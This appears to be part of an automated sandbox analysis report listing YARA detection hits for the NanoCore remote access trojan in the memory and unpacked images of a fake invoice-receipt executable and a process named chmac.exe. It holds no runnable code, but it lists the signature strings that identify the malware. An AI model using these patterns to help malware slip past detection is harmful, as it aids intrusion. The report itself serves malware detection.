00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42dfd:$a: NanoCore 0x42e56:$a: NanoCore 0x42e93:$a: NanoCore 0x42f0c:$a: NanoCore 0x565b7:$a: NanoCore 0x565cc:$a: NanoCore 0x56601:$a: NanoCore 0x6f093:$a: NanoCore 0x6f0a8:$a: NanoCore 0x6f0dd:$a: NanoCore 0x42e5f:$b: ClientPlugin 0x42e9c:$b: ClientPlugin 0x4379a:$b: ClientPlugin 0x437a7:$b: ClientPlugin 0x56373:$b: ClientPlugin 0x5638e:$b: ClientPlugin 0x563be:$b: ClientPlugin 0x565d5:$b: ClientPlugin 0x5660a:$b: ClientPlugin 0x6ee4f:$b: ClientPlugin 0x6ee6a:$b: ClientPlugin
0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42dfd:$a: NanoCore 0x42e56:$a: NanoCore 0x42e93:$a: NanoCore 0x42f0c:$a: NanoCore 0x565b7:$a: NanoCore 0x565cc:$a: NanoCore 0x56601:$a: NanoCore 0x6f093:$a: NanoCore 0x6f0a8:$a: NanoCore 0x6f0dd:$a: NanoCore 0x42e5f:$b: ClientPlugin 0x42e9c:$b: ClientPlugin 0x4379a:$b: ClientPlugin 0x437a7:$b: ClientPlugin 0x56373:$b: ClientPlugin 0x5638e:$b: ClientPlugin 0x563be:$b: ClientPlugin 0x565d5:$b: ClientPlugin 0x5660a:$b: ClientPlugin 0x6ee4f:$b: ClientPlugin 0x6ee6a:$b: ClientPlugin
00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x19667:$a: NanoCore 0x196c0:$a: NanoCore 0x196fd:$a: NanoCore 0x19776:$a: NanoCore 0x196c9:$b: ClientPlugin 0x19706:$b: ClientPlugin 0x1a004:$b: ClientPlugin 0x1a011:$b: ClientPlugin 0x10ed0:$e: KeepAlive 0x19b51:$g: LogClientMessage 0x19ad1:$i: get_Connected 0xb699:$j: #=q 0xb6c9:$j: #=q 0xb705:$j: #=q 0xb72d:$j: #=q 0xb75d:$j: #=q 0xb78d:$j: #=q 0xb7bd:$j: #=q 0xb7ed:$j: #=q 0xb809:$j: #=q 0xb839:$j: #=q
00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xda5d9:$x1: NanoCore.ClientPluginHost 0xda616:$x2: IClientNetworkHost 0xde107:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe9146:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xda2a6:$a: NanoCore 0xda2b6:$a: NanoCore 0xda375:$a: NanoCore 0xda384:$a: NanoCore 0xda585:$a: NanoCore 0xda599:$a: NanoCore 0xda5d9:$a: NanoCore 0xe57b0:$a: NanoCore 0xe57c2:$a: NanoCore 0xe57fe:$a: NanoCore 0xda305:$b: ClientPlugin 0xda3ce:$b: ClientPlugin 0xda5a2:$b: ClientPlugin 0xda5e2:$b: ClientPlugin 0xe57cb:$b: ClientPlugin 0xe5807:$b: ClientPlugin 0xda4c7:$c: ProjectData 0xe56fd:$c: ProjectData 0xdae9b:$d: DESCrypto 0xe605b:$d: DESCrypto 0xe2858:$e: KeepAlive
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb6c3a:$x1: NanoCore.ClientPluginHost 0xb6c77:$x2: IClientNetworkHost 0xba768:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc57ee:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xb6907:$a: NanoCore 0xb6917:$a: NanoCore 0xb69d6:$a: NanoCore 0xb69e5:$a: NanoCore 0xb6be6:$a: NanoCore 0xb6bfa:$a: NanoCore 0xb6c3a:$a: NanoCore 0xc1e58:$a: NanoCore 0xc1e6a:$a: NanoCore 0xc1ea6:$a: NanoCore 0xb6966:$b: ClientPlugin 0xb6a2f:$b: ClientPlugin 0xb6c03:$b: ClientPlugin 0xb6c43:$b: ClientPlugin 0xc1e73:$b: ClientPlugin 0xc1eaf:$b: ClientPlugin 0xb6b28:$c: ProjectData 0xc1da5:$c: ProjectData 0xb74fc:$d: DESCrypto 0xc2703:$d: DESCrypto 0xbeeb9:$e: KeepAlive
Process Memory Space: chmac.exe PID: 6288	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xcd053:$x1: NanoCore.ClientPluginHost 0xcd090:$x2: IClientNetworkHost 0xd0b81:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xdbbc0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: chmac.exe PID: 6288	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: chmac.exe PID: 6288	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xccd20:$a: NanoCore 0xccd30:$a: NanoCore 0xccdef:$a: NanoCore 0xccdfe:$a: NanoCore 0xccfff:$a: NanoCore 0xcd013:$a: NanoCore 0xcd053:$a: NanoCore 0xd822a:$a: NanoCore 0xd823c:$a: NanoCore 0xd8278:$a: NanoCore 0xccd7f:$b: ClientPlugin 0xcce48:$b: ClientPlugin 0xcd01c:$b: ClientPlugin 0xcd05c:$b: ClientPlugin 0xd8245:$b: ClientPlugin 0xd8281:$b: ClientPlugin 0xccf41:$c: ProjectData 0xd8177:$c: ProjectData 0xcd915:$d: DESCrypto 0xd8ad5:$d: DESCrypto 0xd52d2:$e: KeepAlive
Process Memory Space: chmac.exe PID: 6556	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe9f:$x1: NanoCore.ClientPluginHost 0x1dbb4:$x1: NanoCore.ClientPluginHost 0x4912e:$x1: NanoCore.ClientPluginHost 0x5fee3:$x1: NanoCore.ClientPluginHost 0x7e9b1:$x1: NanoCore.ClientPluginHost 0x97413:$x1: NanoCore.ClientPluginHost 0xb267a:$x1: NanoCore.ClientPluginHost 0xedc:$x2: IClientNetworkHost 0x1dbf1:$x2: IClientNetworkHost 0x4916b:$x2: IClientNetworkHost 0x5ff20:$x2: IClientNetworkHost 0x7e9ee:$x2: IClientNetworkHost 0x9742d:$x2: IClientNetworkHost 0xb2694:$x2: IClientNetworkHost 0x49cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xfa53:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x216e2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2c768:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4cc5c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x57ce2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x63a11:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: chmac.exe PID: 6556	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: chmac.exe PID: 6556	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xb6c:$a: NanoCore 0xb7c:$a: NanoCore 0xc3b:$a: NanoCore 0xc4a:$a: NanoCore 0xe4b:$a: NanoCore 0xe5f:$a: NanoCore 0xe9f:$a: NanoCore 0xc0bd:$a: NanoCore 0xc0cf:$a: NanoCore 0xc10b:$a: NanoCore 0x18589:$a: NanoCore 0x185f6:$a: NanoCore 0x18669:$a: NanoCore 0x1d881:$a: NanoCore 0x1d891:$a: NanoCore 0x1d950:$a: NanoCore 0x1d95f:$a: NanoCore 0x1db60:$a: NanoCore 0x1db74:$a: NanoCore 0x1dbb4:$a: NanoCore 0x28dd2:$a: NanoCore
Process Memory Space: chmac.exe PID: 6760	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc5e1d:$x1: NanoCore.ClientPluginHost 0xc5e5a:$x2: IClientNetworkHost 0xc994b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd498a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: chmac.exe PID: 6760	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: chmac.exe PID: 6760	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xc5aea:$a: NanoCore 0xc5afa:$a: NanoCore 0xc5bb9:$a: NanoCore 0xc5bc8:$a: NanoCore 0xc5dc9:$a: NanoCore 0xc5ddd:$a: NanoCore 0xc5e1d:$a: NanoCore 0xd0ff4:$a: NanoCore 0xd1006:$a: NanoCore 0xd1042:$a: NanoCore 0xc5b49:$b: ClientPlugin 0xc5c12:$b: ClientPlugin 0xc5de6:$b: ClientPlugin 0xc5e26:$b: ClientPlugin 0xd100f:$b: ClientPlugin 0xd104b:$b: ClientPlugin 0xc5d0b:$c: ProjectData 0xd0f41:$c: ProjectData 0xc66df:$d: DESCrypto 0xd189f:$d: DESCrypto 0xce09c:$e: KeepAlive
Process Memory Space: chmac.exe PID: 6820	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e5c:$x1: NanoCore.ClientPluginHost 0x3153f:$x1: NanoCore.ClientPluginHost 0x49b65:$x1: NanoCore.ClientPluginHost 0x6d6be:$x1: NanoCore.ClientPluginHost 0x723f9:$x1: NanoCore.ClientPluginHost 0x8b188:$x1: NanoCore.ClientPluginHost 0x9ea16:$x1: NanoCore.ClientPluginHost 0x16e99:$x2: IClientNetworkHost 0x3157c:$x2: IClientNetworkHost 0x49ba2:$x2: IClientNetworkHost 0x6d6d8:$x2: IClientNetworkHost 0x72436:$x2: IClientNetworkHost 0x8b1a2:$x2: IClientNetworkHost 0x9ea53:$x2: IClientNetworkHost 0x1a98a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x25a10:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3506d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x400f3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4d693:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x58719:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x75f27:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: chmac.exe PID: 6820	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: chmac.exe PID: 6820	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x279e:$a: NanoCore 0x280b:$a: NanoCore 0x287e:$a: NanoCore 0x16b29:$a: NanoCore 0x16b39:$a: NanoCore 0x16bf8:$a: NanoCore 0x16c07:$a: NanoCore 0x16e08:$a: NanoCore 0x16e1c:$a: NanoCore 0x16e5c:$a: NanoCore 0x2207a:$a: NanoCore 0x2208c:$a: NanoCore 0x220c8:$a: NanoCore 0x3120c:$a: NanoCore 0x3121c:$a: NanoCore 0x312db:$a: NanoCore 0x312ea:$a: NanoCore 0x314eb:$a: NanoCore 0x314ff:$a: NanoCore 0x3153f:$a: NanoCore 0x3c75d:$a: NanoCore
Click to see the 92 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.chmac.exe.2906888.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
16.2.chmac.exe.2906888.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
14.2.chmac.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.2.chmac.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.415058.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.415058.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.0.chmac.exe.415058.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.415058.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.chmac.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.2.chmac.exe.38e3258.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.38e3258.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.2.chmac.exe.38e3258.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.38e3258.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.0.chmac.exe.415058.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.415058.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.0.chmac.exe.415058.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.415058.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.chmac.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
